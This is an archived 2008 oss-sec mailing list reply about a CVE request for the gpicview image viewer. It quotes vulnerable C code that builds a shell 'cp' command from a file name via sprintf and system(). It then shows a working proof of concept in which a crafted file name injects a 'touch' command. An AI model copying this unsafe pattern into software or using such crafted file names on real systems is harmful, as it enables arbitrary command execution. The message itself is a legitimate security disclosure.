oss-sec mailing list archives
Re: CVE Request (gpicview)
From: Robert Buchholz <rbu () gentoo org>
Date: Wed, 3 Sep 2008 01:59:47 +0200
On Sunday 31 August 2008, Nico Golde wrote:
Same piece of code main-win.c doesn't look too trustworthy to me either: 690 int error = jpegtran (filename, "/tmp/rot.jpg" , code); 691 if(error) 692 return error; 693 694 //now copy /tmp/rot.jpg back to the original file 695 char command[strlen(filename)+50]; //this should not generate buffer owerflow 696 // MS: didn't know, how to make it better, maybe an own copy routine 697 sprintf(command,"cp /tmp/rot.jpg \"%s\"",filename); 698 system(command); Anyone played with crafted file names?
Good catch! You need to append '.jpg' at the end of the crafed filename so the rotation via jpegtran is invoked, but besides that it works ok: rbu@peanut ~/devel/gentoo/security/gpicview $ ls -l total 484K -rw------- 1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg rbu@peanut ~/devel/gentoo/security/gpicview $ gpicview * QSettings: failed to open file '/usr/qt/3/etc/settings/qt_plugins_3.3rc' sh: .jpg: command not found ^C rbu@peanut ~/devel/gentoo/security/gpicview $ ls -l total 960K -rw------- 1 rbu rbu 469K 2008-09-03 01:52 bla.jpg -rw------- 1 rbu rbu 469K 2008-09-03 01:35 bla.jpg"; touch XX ;".jpg -rw------- 1 rbu rbu 0 2008-09-03 01:52 XX Robert
Attachment:
signature.asc
Description: This is a digitally signed message part.
Current thread:
- CVE Request (gpicview) Jan Lieskovsky (Aug 25)
- Re: CVE Request (gpicview) Steven M. Christey (Aug 26)
- Re: CVE Request (gpicview) Jan Lieskovsky (Aug 26)
- Re: CVE Request (gpicview) Robert Buchholz (Sep 13)
- Re: CVE Request (gpicview) Nico Golde (Aug 30)
- Re: CVE Request (gpicview) Jan Lieskovsky (Aug 31)
- Re: CVE Request (gpicview) Nico Golde (Sep 04)
- Re: CVE Request (gpicview) Robert Buchholz (Sep 02)
- Re: CVE Request (gpicview) Nico Golde (Sep 04)
- Re: CVE Request (gpicview) Steven M. Christey (Sep 04)
- Re: CVE Request (gpicview) Jan Lieskovsky (Aug 31)
- Re: CVE Request (gpicview) Steven M. Christey (Aug 26)